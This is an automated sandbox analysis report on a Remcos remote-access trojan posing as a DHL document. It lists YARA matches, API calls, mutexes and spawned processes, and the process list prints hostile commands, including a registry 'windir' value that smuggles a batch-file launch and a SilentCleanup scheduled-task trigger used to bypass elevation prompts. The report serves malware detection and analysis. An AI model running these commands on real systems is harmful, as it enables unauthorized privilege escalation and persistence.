Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000014.00000002.2662959040.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_105450B2 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
Contains functionality to shutdown / reboot the system
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_1053F833 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress
Detected potential crypto function
Source: C:\Users\user\Xgku\Xgkuees.exe | Code function: 11_3_022ECB09
Source: C:\Users\user\Xgku\Xgkuees.exe | Code function: 11_3_022D2FE1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040D1E8
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 105452E4 appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 00413956 appears 47 times
PE file contains strange resources
Source: DHL_Details.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: DHL_Details.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DHL_Details.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DHL_Details.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file name differs from the original file name gathered from version info
Source: DHL_Details.exe | Binary or memory string: OriginalFilename vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000002.1154211402.0000000004890000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000002.1150480060.00000000022D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000003.1107806883.0000000002354000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000002.1152567508.0000000002900000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs DHL_Details.exe
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses reg.exe to modify the Windows registry
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Yara signature match
Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000014.00000002.2662959040.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Classification label
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@35/10@2/2
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 12_2_0040EB33
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_105404C1 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 12_2_105404C1
Contains functionality to check free disk space
Source: C:\Users\user\Xgku\Xgkuest.exe | Code function: 10_2_00405AC8 GetDiskFreeSpaceA, 10_2_00405AC8
Contains functionality to enum processes or threads
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_00409AA0 GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 12_2_00409AA0
Contains functionality to load and extract PE file embedded resources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_00409D73 FindResourceA,LoadResource,LockResource,SizeofResource, 12_2_00409D73
Contains functionality to modify services (start/stop/modify)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 12_2_004111A9
Creates files inside the user directory
Source: C:\Users\user\Desktop\DHL_Details.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PKAQFTEH\1YeIhasQd-1KZ177FInnElYbHMifTTTeL[1].htm
Creates mutexes
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-37S93M
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
Creates temporary files
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | File created: C:\Users\user\AppData\Local\Temp\mkjnccfrzfmqzvxtdzmihgnrtw
Executes batch files
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Parts of this application are using Borland Delphi (probably coded in Delphi)
Source: C:\Users\user\Desktop\DHL_Details.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\DHL_Details.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\DHL_Details.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuest.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuees.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuees.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuees.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuest.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuees.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuees.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Xgku\Xgkuees.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Reads ini files
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\DHL_Details.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Users\user\Desktop\DHL_Details.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DHL_Details.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DHL_Details.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DHL_Details.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: DHL_Details.exe | Virustotal: Detection: 11%
Sample reads its own file content
Source: C:\Users\user\Desktop\DHL_Details.exe | File read: C:\Users\user\Desktop\DHL_Details.exe
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\DHL_Details.exe 'C:\Users\user\Desktop\DHL_Details.exe'
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Xgku\Xgku.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknown | Process created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe'
Source: unknown | Process created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exe
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
